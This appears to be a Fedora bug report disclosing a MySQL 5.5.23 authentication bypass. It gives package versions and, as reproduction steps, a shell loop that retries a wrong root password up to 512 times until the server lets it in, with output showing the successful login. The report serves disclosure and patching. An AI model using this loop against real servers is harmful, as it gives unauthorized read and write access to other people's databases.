Bug 830650

Description of problem:

Any user without MySQL username/password is able to query and update databases with a hack that has recently been posted online:

Version-Release number of selected component (if applicable):
sh-4.2$ rpm -qa | grep -i mysql
mysql-connector-odbc-5.1.10-1.fc17.x86_64
mysql-5.5.23-1.fc17.x86_64
mysql-libs-5.5.23-1.fc17.x86_64
perl-DBD-MySQL-4.020-2.fc17.x86_64
mysql-workbench-5.2.40-1.fc17.x86_64
mysql-utilities-1.0.5-2.fc17.noarch
php-mysql-5.4.3-1.fc17.x86_64
mysql-server-5.5.23-1.fc17.x86_64
mysql-connector-python-0.3.2-3.fc17.noarch
sh-4.2$ uname -a
Linux wombat 3.3.7-1.fc17.x86_64 #1 SMP Mon May 21 22:32:19 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
sh-4.2$



How reproducible:


Steps to Reproduce:
1. Open terminal
2. for i in `seq 1 512`; do echo 'select @@version;' | mysql -h 127.0.0.1 -u root mysql --password=X 2>/dev/null && break; done
3.
  
Actual results:
sh-4.2$ for i in `seq 1 512`; do echo 'select @@version;' | mysql -h 127.0.0.1 -u root mysql --password=X 2>/dev/null && break; done
@@version
5.5.23
sh-4.2$


Expected results:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)



Additional info: